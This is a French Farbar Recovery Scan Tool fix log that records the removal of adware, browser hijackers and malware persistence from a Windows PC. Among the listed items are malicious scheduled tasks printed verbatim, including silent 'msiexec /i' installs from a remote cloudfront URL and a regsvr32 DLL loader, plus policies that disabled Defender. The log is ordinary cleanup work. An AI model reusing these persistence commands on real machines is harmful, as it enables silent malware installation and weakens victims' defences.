Résultats de correction de Farbar Recovery Scan Tool (x64) Version: 17.03.2019
Exécuté par ADMIN (09-04-2019 19:56:40) Run:1
Exécuté depuis F:\telechargements
Profils chargés: ADMIN (Profils disponibles: ADMIN)
Mode d'amorçage: Normal
==============================================

fixlist contenu:
*****************
closeprocesses:
createrestorepoint:
HKU\S-1-5-21-3948345469-1245381183-4131720330-1001\...\ChromeHTML: -> "C:\Program Files (x86)\Hotleaf\Application\chrome.exe" "%1" <==== ATTENTION
ShellIconOverlayIdentifiers: [ MEGA (Pending)] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => -> Pas de fichier
ShellIconOverlayIdentifiers: [ MEGA (Synced)] -> {05B38830-F4E9-4329-978B-1DD28605D202} => -> Pas de fichier
ShellIconOverlayIdentifiers: [ MEGA (Syncing)] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => -> Pas de fichier
ShellIconOverlayIdentifiers-x32: [ MEGA (Pending)] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => -> Pas de fichier
ShellIconOverlayIdentifiers-x32: [ MEGA (Synced)] -> {05B38830-F4E9-4329-978B-1DD28605D202} => -> Pas de fichier
ShellIconOverlayIdentifiers-x32: [ MEGA (Syncing)] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => -> Pas de fichier
ContextMenuHandlers1: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => -> Pas de fichier
ContextMenuHandlers3: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => -> Pas de fichier
ContextMenuHandlers4: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => -> Pas de fichier
Task: {0652ED1F-CA4F-4B98-810B-22EB66A93066} - System32\Tasks\T9uokqd4gm => C:\Program Files (x86)\LDzb9VyIAK\updengine.exe <==== ATTENTION
Task: {0F97A10D-8F4A-4571-ABB1-EF297D400EEE} - System32\Tasks\{5D72712C-CDD5-787C-1BBC-250D03C2F740} => C:\WINDOWS\system32\regsvr32.exe /s /n /i:"/rt" "C:\PROGRA~3\fd5c00da\a310fc0f.dll" <==== ATTENTION
Task: {11A00D8A-4A78-41B4-AFBC-0F11AE2472AC} - System32\Tasks\Pregerght => "msiexec" /i hxxp://D2bUH1bF1g584W.clOuDfroNt.net/mmtsk/occup.php?p=CorsairXForceXLSXSSD_16208112000102370009&d=20170404 /q <==== ATTENTION
Task: {444DA152-0E01-4FD6-973A-083E603E7247} - \Microsoft\Windows\UNP\RunCampaignManager -> Pas de fichier <==== ATTENTION
Task: {461EFA9A-4B5E-4489-9E95-EC4DE5F88DA7} - System32\Tasks\{54A0C09F-E30B-7734-4C86-151770ACEB88} => C:\ProgramData\{23521D5C-94F9-AAF7-43CB-EAB26C53D458}\6054B248-D7FF-05E3-9266-BF30D04BEB69.exe <==== ATTENTION
Task: {48617214-C3BB-4ACE-A042-EDD648B5839F} - System32\Tasks\Clajerytermdom => "msiexec" /i hxxp://D2bUH1bF1g584W.clOuDfroNt.net/mmtsk/occup.php?p=CorsairXForceXLSXSSD_16208112000102370009&d=20170508 /q <==== ATTENTION
Task: {45E52EEC-96E4-4BDD-B84E-052A1316C79B} - System32\Tasks\Opera scheduled suite Autoupdate 1508534772 => C:\Users\ADMIN\AppData\Local\Programs\Opera\launcher.exe
Task: {98AAE19E-8DD5-41F8-B911-127A78CBE578} - System32\Tasks\Opera scheduled Autoupdate 1508534770 => C:\Users\ADMIN\AppData\Local\Programs\Opera\launcher.exe
Task: {C72E08C7-CA31-4F19-8D95-A4BE93CAD113} - System32\Tasks\Ernaghtkuhersy Helper => C:\Program Files (x86)\Nimkdejersp\xarerleward.exe
Task: {D10C9D6D-BB5E-479C-9C99-D7F2E2AC2246} - System32\Tasks\Ufatainhtck Manager => C:\Program Files (x86)\Reugetainbokadom\rerdasp.exe
C:\Program Files (x86)\Reugetainbokadom
C:\Program Files (x86)\Nimkdejersp
C:\Program Files (x86)\Hotleaf
C:\Program Files (x86)\LDzb9VyIAK
C:\ProgramData\{23521D5C-94F9-AAF7-43CB-EAB26C53D458}
C:\Program Files (x86)\Bookness
C:\Program Files (x86)\Popcorn Time
virustotal: C:\Program Files\System Updates\Windows Driver System Update\Windows Driver System Updater.exe
AlternateDataStreams: C:\Users\ADMIN:Heroes & Generals [38]
AlternateDataStreams: C:\ProgramData\.rdata:X [526]
AlternateDataStreams: C:\ProgramData\TEMP:FB6A21E3 [430]
HKLM Group Policy restriction on software: %systemroot%\system32\mrt.exe <==== ATTENTION
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
GroupPolicy: Restriction ? <==== ATTENTION
GroupPolicy\User: Restriction ? <==== ATTENTION
SearchScopes: HKLM -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSE1
SearchScopes: HKLM -> {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSE1
SearchScopes: HKLM-x32 -> DefaultScope {E9410C70-B6AE-41FF-AB71-32F4B279EA5F} URL = hxxps://www.google.com/search?bcutc=sp-006&q={searchTerms}
SearchScopes: HKLM-x32 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSE1
SearchScopes: HKLM-x32 -> {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSE1
SearchScopes: HKLM-x32 -> {E9410C70-B6AE-41FF-AB71-32F4B279EA5F} URL = hxxps://www.google.com/search?bcutc=sp-006&q={searchTerms}
SearchScopes: HKU\S-1-5-21-3948345469-1245381183-4131720330-1001 -> DefaultScope {E9410C70-B6AE-41FF-AB71-32F4B279EA5F} URL = hxxps://www.google.com/search?bcutc=sp-006&q={searchTerms}
SearchScopes: HKU\S-1-5-21-3948345469-1245381183-4131720330-1001 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://www.bing.com/search?pc=COSP&ptag=D022118-A5AF4E3D53C&form=CONBDF&conlogo=CT3335878&q={searchTerms}
SearchScopes: HKU\S-1-5-21-3948345469-1245381183-4131720330-1001 -> {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL =
SearchScopes: HKU\S-1-5-21-3948345469-1245381183-4131720330-1001 -> {E9410C70-B6AE-41FF-AB71-32F4B279EA5F} URL = hxxps://www.google.com/search?bcutc=sp-006&q={searchTerms}
SearchScopes: HKU\S-1-5-21-3948345469-1245381183-4131720330-1001 -> {FFEBBF0A-C22C-4172-89FF-45215A135AC7} URL = hxxp://go.mail.ru/distib/ep/?q={searchTerms}&fr=ntg&product_id=%7B9008B455-5D19-43D5-A87F-A8D73C1AD082%7D&gp=811610
BHO-x32: Pas de nom -> {8E8F97CD-60B5-456F-A201-73065652D099} -> Pas de fichier
Edge HomeButtonPage: HKU\S-1-5-21-3948345469-1245381183-4131720330-1001 ->
FF Plugin HKU\S-1-5-21-3948345469-1245381183-4131720330-1001: @my.com/Games -> C:\Users\ADMIN\AppData\Local\MyComGames\NPMyComDetector.dll [Pas de fichier]
CHR HomePage: Default -> inline.go.mail.ru
CHR StartupUrls: Default -> "hxxp://mail.ru/cnt/10445?gp=834423"
CHR NewTab: Default -> Not-active:"chrome-extension://lhemechcanjmilllmccjbjldonmnnjjj/visual-bookmarks.html"
CHR DefaultSearchURL: Default -> hxxps://inline.go.mail.ru/search?inline_comp=dse&q={searchTerms}&fr=chxtn12.0.23
CHR DefaultSearchKeyword: Default -> inline.go.mail.ru
CHR DefaultSuggestURL: Default -> hxxp://suggests.go.mail.ru/chrome?q={searchTerms}
CHR Session Restore: Default -> est activé.
C:\Users\ADMIN\AppData\Local\Google\Chrome\User Data\Default\Extensions\bhjhnafpiilpffhglajcaepjbnbjemci
C:\Users\ADMIN\AppData\Local\Google\Chrome\User Data\Default\Extensions\hcadgijmedbfgciegjomfpjcdchlhnif
C:\Users\ADMIN\AppData\Local\Google\Chrome\User Data\Default\Extensions\lhemechcanjmilllmccjbjldonmnnjjj
CHR HKLM-x32\...\Chrome\Extension: [bhjhnafpiilpffhglajcaepjbnbjemci] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [eofcbnmajmjmplflapaojjnihcjkigck] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [gomekmidlodglbbmalcneegieacbdmki] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [hcadgijmedbfgciegjomfpjcdchlhnif] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [lhemechcanjmilllmccjbjldonmnnjjj] - hxxps://clients2.google.com/service/update2/crx
HKU\.DEFAULT\...\StartMenuInternet\ChromeHTML: -> C:\Program Files (x86)\Bookness\Application\chrome.exe <==== ATTENTION
HKU\S-1-5-21-3948345469-1245381183-4131720330-1001\...\StartMenuInternet\ChromeHTML: -> C:\Program Files (x86)\Hotleaf\Application\chrome.exe <==== ATTENTION
HKU\S-1-5-18\...\StartMenuInternet\ChromeHTML: -> C:\Program Files (x86)\Bookness\Application\chrome.exe <==== ATTENTION
S4 Update service; C:\Program Files (x86)\Popcorn Time\Updater.exe [X]
S3 cpuz143; C:\Users\ADMIN\AppData\Local\Temp\cpuz143\cpuz143_x64.sys [48952 2019-04-08] (CPUID -> CPUID) <==== ATTENTION
hosts:
cmd: netsh advfirewall reset
emptytemp:

*****************

Processus fermé avec succès.
Le Point de restauration a été créé avec succès.
HKU\S-1-5-21-3948345469-1245381183-4131720330-1001_Classes\ChromeHTML => supprimé(es) avec succès
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ MEGA (Pending) => supprimé(es) avec succès
HKLM\Software\Classes\CLSID\{056D528D-CE28-4194-9BA3-BA2E9197FF8C} => non trouvé(e)
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ MEGA (Synced) => supprimé(es) avec succès
HKLM\Software\Classes\CLSID\{05B38830-F4E9-4329-978B-1DD28605D202} => non trouvé(e)
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ MEGA (Syncing) => supprimé(es) avec succès
HKLM\Software\Classes\CLSID\{0596C850-7BDD-4C9D-AFDF-873BE6890637} => non trouvé(e)
HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ MEGA (Pending) => supprimé(es) avec succès
HKLM\Software\Wow6432Node\Classes\CLSID\{056D528D-CE28-4194-9BA3-BA2E9197FF8C} => non trouvé(e)
HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ MEGA (Synced) => supprimé(es) avec succès
HKLM\Software\Wow6432Node\Classes\CLSID\{05B38830-F4E9-4329-978B-1DD28605D202} => non trouvé(e)
HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ MEGA (Syncing) => supprimé(es) avec succès
HKLM\Software\Wow6432Node\Classes\CLSID\{0596C850-7BDD-4C9D-AFDF-873BE6890637} => non trouvé(e)
HKLM\Software\Classes\*\ShellEx\ContextMenuHandlers\MEGA (Context menu) => supprimé(es) avec succès
HKLM\Software\Classes\CLSID\{0229E5E7-09E9-45CF-9228-0228EC7D5F17} => non trouvé(e)
HKLM\Software\Classes\AllFileSystemObjects\ShellEx\ContextMenuHandlers\MEGA (Context menu) => supprimé(es) avec succès
HKLM\Software\Classes\CLSID\{0229E5E7-09E9-45CF-9228-0228EC7D5F17} => non trouvé(e)
HKLM\Software\Classes\Directory\ShellEx\ContextMenuHandlers\MEGA (Context menu) => supprimé(es) avec succès
HKLM\Software\Classes\CLSID\{0229E5E7-09E9-45CF-9228-0228EC7D5F17} => non trouvé(e)
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{0652ED1F-CA4F-4B98-810B-22EB66A93066}" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{0652ED1F-CA4F-4B98-810B-22EB66A93066}" => supprimé(es) avec succès
C:\WINDOWS\System32\Tasks\T9uokqd4gm => déplacé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\T9uokqd4gm" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{0F97A10D-8F4A-4571-ABB1-EF297D400EEE}" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{0F97A10D-8F4A-4571-ABB1-EF297D400EEE}" => supprimé(es) avec succès
C:\WINDOWS\System32\Tasks\{5D72712C-CDD5-787C-1BBC-250D03C2F740} => déplacé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{5D72712C-CDD5-787C-1BBC-250D03C2F740}" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{11A00D8A-4A78-41B4-AFBC-0F11AE2472AC}" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{11A00D8A-4A78-41B4-AFBC-0F11AE2472AC}" => supprimé(es) avec succès
C:\WINDOWS\System32\Tasks\Pregerght => déplacé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Pregerght" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{444DA152-0E01-4FD6-973A-083E603E7247}" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{444DA152-0E01-4FD6-973A-083E603E7247}" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\UNP\RunCampaignManager" => non trouvé(e)
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{461EFA9A-4B5E-4489-9E95-EC4DE5F88DA7}" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{461EFA9A-4B5E-4489-9E95-EC4DE5F88DA7}" => supprimé(es) avec succès
C:\WINDOWS\System32\Tasks\{54A0C09F-E30B-7734-4C86-151770ACEB88} => déplacé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{54A0C09F-E30B-7734-4C86-151770ACEB88}" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{48617214-C3BB-4ACE-A042-EDD648B5839F}" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{48617214-C3BB-4ACE-A042-EDD648B5839F}" => supprimé(es) avec succès
C:\WINDOWS\System32\Tasks\Clajerytermdom => déplacé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Clajerytermdom" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{45E52EEC-96E4-4BDD-B84E-052A1316C79B}" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{45E52EEC-96E4-4BDD-B84E-052A1316C79B}" => supprimé(es) avec succès
C:\WINDOWS\System32\Tasks\Opera scheduled suite Autoupdate 1508534772 => déplacé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Opera scheduled suite Autoupdate 1508534772" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{98AAE19E-8DD5-41F8-B911-127A78CBE578}" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{98AAE19E-8DD5-41F8-B911-127A78CBE578}" => supprimé(es) avec succès
C:\WINDOWS\System32\Tasks\Opera scheduled Autoupdate 1508534770 => déplacé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Opera scheduled Autoupdate 1508534770" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{C72E08C7-CA31-4F19-8D95-A4BE93CAD113}" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{C72E08C7-CA31-4F19-8D95-A4BE93CAD113}" => supprimé(es) avec succès
C:\WINDOWS\System32\Tasks\Ernaghtkuhersy Helper => déplacé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Ernaghtkuhersy Helper" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{D10C9D6D-BB5E-479C-9C99-D7F2E2AC2246}" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{D10C9D6D-BB5E-479C-9C99-D7F2E2AC2246}" => supprimé(es) avec succès
C:\WINDOWS\System32\Tasks\Ufatainhtck Manager => déplacé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Ufatainhtck Manager" => supprimé(es) avec succès
C:\Program Files (x86)\Reugetainbokadom => déplacé(es) avec succès
"C:\Program Files (x86)\Nimkdejersp" => non trouvé(e)
"C:\Program Files (x86)\Hotleaf" => non trouvé(e)
"C:\Program Files (x86)\LDzb9VyIAK" => non trouvé(e)
C:\ProgramData\{23521D5C-94F9-AAF7-43CB-EAB26C53D458} => déplacé(es) avec succès
"C:\Program Files (x86)\Bookness" => non trouvé(e)
"C:\Program Files (x86)\Popcorn Time" => non trouvé(e)
VirusTotal: C:\Program Files\System Updates\Windows Driver System Update\Windows Driver System Updater.exe => https://www.virustotal.com/file/657d0f4bfb473f6ceac26d8b967e814d8765a2b6d3c8e0cb4812e20f8602ec44/analysis/1550505288/
C:\Users\ADMIN => ":Heroes & Generals" ADS supprimé(es) avec succès
C:\ProgramData\.rdata => ":X" ADS supprimé(es) avec succès
C:\ProgramData\TEMP => ":FB6A21E3" ADS supprimé(es) avec succès
HKLM Group Policy restriction on software: %systemroot%\system32\mrt.exe <==== ATTENTION => restauré(es) avec succès
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender => supprimé(es) avec succès
C:\WINDOWS\system32\GroupPolicy\Machine => déplacé(es) avec succès
C:\WINDOWS\system32\GroupPolicy\GPT.ini => déplacé(es) avec succès
C:\WINDOWS\SysWOW64\GroupPolicy\GPT.ini => déplacé(es) avec succès
C:\WINDOWS\system32\GroupPolicy\User => déplacé(es) avec succès
HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86} => supprimé(es) avec succès
HKLM\Software\Classes\CLSID\{33BB0A4E-99AF-4226-BDF6-49120163DE86} => non trouvé(e)
HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{6A1806CD-94D4-4689-BA73-E35EA1EA9990} => supprimé(es) avec succès
HKLM\Software\Classes\CLSID\{6A1806CD-94D4-4689-BA73-E35EA1EA9990} => non trouvé(e)
HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => valeur restauré(es) avec succès
HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86} => supprimé(es) avec succès
HKLM\Software\Wow6432Node\Classes\CLSID\{33BB0A4E-99AF-4226-BDF6-49120163DE86} => non trouvé(e)
HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{6A1806CD-94D4-4689-BA73-E35EA1EA9990} => supprimé(es) avec succès
HKLM\Software\Wow6432Node\Classes\CLSID\{6A1806CD-94D4-4689-BA73-E35EA1EA9990} => non trouvé(e)
HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{E9410C70-B6AE-41FF-AB71-32F4B279EA5F} => supprimé(es) avec succès
HKLM\Software\Wow6432Node\Classes\CLSID\{E9410C70-B6AE-41FF-AB71-32F4B279EA5F} => non trouvé(e)
"HKU\S-1-5-21-3948345469-1245381183-4131720330-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope" => supprimé(es) avec succès
HKU\S-1-5-21-3948345469-1245381183-4131720330-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A} => supprimé(es) avec succès
HKLM\Software\Classes\CLSID\{0633EE93-D776-472f-A0FF-E1416B8B2E3A} => non trouvé(e)
HKU\S-1-5-21-3948345469-1245381183-4131720330-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{6A1806CD-94D4-4689-BA73-E35EA1EA9990} => supprimé(es) avec succès
HKLM\Software\Classes\CLSID\{6A1806CD-94D4-4689-BA73-E35EA1EA9990} => non trouvé(e)
HKU\S-1-5-21-3948345469-1245381183-4131720330-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{E9410C70-B6AE-41FF-AB71-32F4B279EA5F} => supprimé(es) avec succès
HKLM\Software\Classes\CLSID\{E9410C70-B6AE-41FF-AB71-32F4B279EA5F} => non trouvé(e)
HKU\S-1-5-21-3948345469-1245381183-4131720330-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{FFEBBF0A-C22C-4172-89FF-45215A135AC7} => supprimé(es) avec succès
HKLM\Software\Classes\CLSID\{FFEBBF0A-C22C-4172-89FF-45215A135AC7} => non trouvé(e)
HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{8E8F97CD-60B5-456F-A201-73065652D099} => supprimé(es) avec succès
HKLM\Software\Wow6432Node\Classes\CLSID\{8E8F97CD-60B5-456F-A201-73065652D099} => non trouvé(e)
"HKU\S-1-5-21-3948345469-1245381183-4131720330-1001\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\\HomeButtonPage" => supprimé(es) avec succès
HKU\S-1-5-21-3948345469-1245381183-4131720330-1001\Software\MozillaPlugins\@my.com/Games => supprimé(es) avec succès
"C:\Users\ADMIN\AppData\Local\MyComGames\NPMyComDetector.dll" => non trouvé(e)
"Chrome HomePage" => supprimé(es) avec succès
"Chrome StartupUrls" => supprimé(es) avec succès
"Chrome NewTab" => supprimé(es) avec succès
"Chrome DefaultSearchURL" => supprimé(es) avec succès
"Chrome DefaultSearchKeyword" => supprimé(es) avec succès
"Chrome DefaultSuggestURL" => non trouvé(e)
"Chrome Session Restore:" => non trouvé(e)
"C:\Users\ADMIN\AppData\Local\Google\Chrome\User Data\Default\Extensions\bhjhnafpiilpffhglajcaepjbnbjemci" => non trouvé(e)
"C:\Users\ADMIN\AppData\Local\Google\Chrome\User Data\Default\Extensions\hcadgijmedbfgciegjomfpjcdchlhnif" => non trouvé(e)
"C:\Users\ADMIN\AppData\Local\Google\Chrome\User Data\Default\Extensions\lhemechcanjmilllmccjbjldonmnnjjj" => non trouvé(e)
HKLM\SOFTWARE\Wow6432Node\Google\Chrome\Extensions\bhjhnafpiilpffhglajcaepjbnbjemci => supprimé(es) avec succès
HKLM\SOFTWARE\Wow6432Node\Google\Chrome\Extensions\eofcbnmajmjmplflapaojjnihcjkigck => supprimé(es) avec succès
HKLM\SOFTWARE\Wow6432Node\Google\Chrome\Extensions\gomekmidlodglbbmalcneegieacbdmki => supprimé(es) avec succès
HKLM\SOFTWARE\Wow6432Node\Google\Chrome\Extensions\hcadgijmedbfgciegjomfpjcdchlhnif => supprimé(es) avec succès
HKLM\SOFTWARE\Wow6432Node\Google\Chrome\Extensions\lhemechcanjmilllmccjbjldonmnnjjj => supprimé(es) avec succès
HKU\.DEFAULT\SOFTWARE\Clients\StartMenuInternet\ChromeHTML => supprimé(es) avec succès
HKU\S-1-5-21-3948345469-1245381183-4131720330-1001\SOFTWARE\Clients\StartMenuInternet\ChromeHTML => supprimé(es) avec succès
HKU\S-1-5-18\SOFTWARE\Clients\StartMenuInternet\ChromeHTML => non trouvé(e)
HKLM\System\CurrentControlSet\Services\Update service => supprimé(es) avec succès
Update service => service supprimé(es) avec succès
HKLM\System\CurrentControlSet\Services\cpuz143 => supprimé(es) avec succès
cpuz143 => service supprimé(es) avec succès
C:\Windows\System32\Drivers\etc\hosts => déplacé(es) avec succès
Hosts restauré(es) avec succès.

========= netsh advfirewall reset =========

Ok.


========= Fin de CMD: =========


=========== EmptyTemp: ==========

BITS transfer queue => 10510336 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 16924496 B
Java, Flash, Steam htmlcache => 23036732 B
Windows/system/drivers => 14855049 B
Edge => 10335904 B
Chrome => 55318518 B
Firefox => 0 B
Opera => 0 B

Temp, IE cache, history, cookies, recent:
Default => 0 B
Users => 0 B
ProgramData => 0 B
Public => 0 B
systemprofile => 0 B
systemprofile32 => 0 B
LocalService => 151842 B
LocalService => 0 B
NetworkService => 0 B
NetworkService => 0 B
ADMIN => 2860500017 B

RecycleBin => 0 B
EmptyTemp: => 2.8 GB données temporaires supprimées.

================================


Le système a dû redémarrer.

==== Fin de Fixlog 19:58:12 ====